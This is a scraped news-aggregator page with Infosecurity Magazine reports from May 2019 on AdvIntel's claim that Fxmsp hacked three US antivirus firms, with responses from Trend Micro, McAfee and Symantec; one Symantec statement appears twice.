Symantec said it is aware of recent claims that a number of US-based antivirus companies were breached, and a spokesperson said, “We have been in contact with researchers at AdvIntel, who confirmed that Symantec (Norton) has not been impacted. We do not believe there is reason for our customers to be concerned.”

*AdvIntel admitted in a message to Computer Business Review that Fxmsp had not provided “sufficient evidence to support this allegation [that Symantec was hacked].” The company added: “We believe with a high degree of confidence that Symantec’s assessment of risks and their statement that ‘there is no reason for our [Symantec] customers to be concerned currently’ is correct.”

*Updated May 15 to include statement from CBR shared with Infosecurity by Symantec.

Categories: Cyber Risk News

Speculators Look to ID AVs Hacked by Russia

Info Security - Tue, 05/14/2019 - 18:15
Speculators Look to ID AVs Hacked by Russia

Last week Infosecurity Magazine reported on threat intelligence published by Advanced Intelligence (AdvIntel) claiming that three US antivirus companies had been hacked by a top-tier Russian hacking collective.

While the original research did not identify the impacted companies, both Gizmodo and Bleeping Computer have reported that McAfee, Symantec and Trend Micro are the three companies in question.

Though it does try to adhere to the general rule of not discussing victim entities, an AdvIntel spokesperson said in an email, “Given the latest independent corroboration and publication, we can confirm that Trend Micro and McAfee were two of the companies that were claimed to be breached by the actor group with their internal access and data for sale.”

Trend Micro has confirmed that an unauthorized third party accessed a single testing lab network. “We have an active investigation underway related to recent claims, and while it is not complete, we want to transparently share what we have learned. Working closely with law enforcement, our global threat research and forensic teams are leading this investigation,” a Trend Micro spokesperson wrote in an email.

“Some low-risk debugging related information was obtained. We are nearing the end of our investigation and at this time we have seen no indication that any customer data nor source code were accessed or exfiltrated. Immediate action was taken to quarantine the lab and additionally secure all corresponding environments. Due to the active nature of the investigation, we are not in a position to share any additional information, but we will provide an update when additional insights become available and can be disclosed.”

A McAfee spokesperson wrote, “McAfee has been conducting a thorough investigation into these claims. To date, we’ve found no indication that McAfee products, services or networks have been impacted by the campaign described.”

AdvIntel said that it had reached out to all of the purported victims, as well as the law enforcement, regarding Fxmsp well before its initial blog was released. Though the company did not comment on whether Symantec was one of the breached companies, there has been speculation that Symantec is the third victim.

Symantec said it is aware of recent claims that a number of US-based antivirus companies were breached, and a spokesperson said, “We have been in contact with researchers at AdvIntel, who confirmed that Symantec (Norton) has not been impacted. We do not believe there is reason for our customers to be concerned.”

Categories: Cyber Risk News

Pages